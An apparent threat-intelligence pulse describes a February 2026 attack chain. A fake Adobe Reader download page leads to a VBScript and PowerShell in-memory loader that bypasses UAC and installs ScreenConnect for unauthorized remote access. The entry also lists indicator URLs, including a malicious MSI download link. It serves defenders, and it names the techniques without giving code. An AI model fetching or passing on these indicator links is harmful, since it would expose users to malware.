In-Memory Loader Drops ScreenConnect

April 10, 2026, 10:07 a.m.

Description

In February 2026, an attack chain was discovered that utilized a fraudulent Adobe Acrobat Reader download page to deceive victims into installing ConnectWise's ScreenConnect, a legitimate remote access tool exploited for malicious purposes. The attack employs sophisticated evasion techniques including heavy obfuscation, .NET reflection for in-memory payload execution, and dynamic code construction. A VBScript loader initiates the chain by downloading and executing obfuscated PowerShell commands that compile C# code entirely in memory. The loader manipulates the Process Environment Block to masquerade as legitimate Windows processes and abuses auto-elevated COM objects to bypass User Account Control without user prompts. This multi-layered approach successfully evades signature-based defenses and hinders forensic analysis while ultimately deploying ScreenConnect for unauthorized remote access.

External References

https://www.zscaler.com/blogs/security-research/memory-loader-drops-screenconnect
https://otx.alienvault.com/pulse/69d8b1848ae30fd4dab9095d
Tags
screenconnect
in-memory execution
remote access tool
uac bypass
2026-04-10
com abuse
peb manipulation
powershell staging
vbscript loader

Date

  • Created: April 10, 2026, 8:15 a.m.
  • Published: April 10, 2026, 8:15 a.m.
  • Modified: April 10, 2026, 10:07 a.m.

Indicators

  • http://x0.at/qOfN.msi
  • http://eshareflies.im/ad/
  • https://x0.at/qOfN.msi
Download all indicators here!

Attack Patterns

  • ScreenConnect

Additional Informations

  • eshareflies.im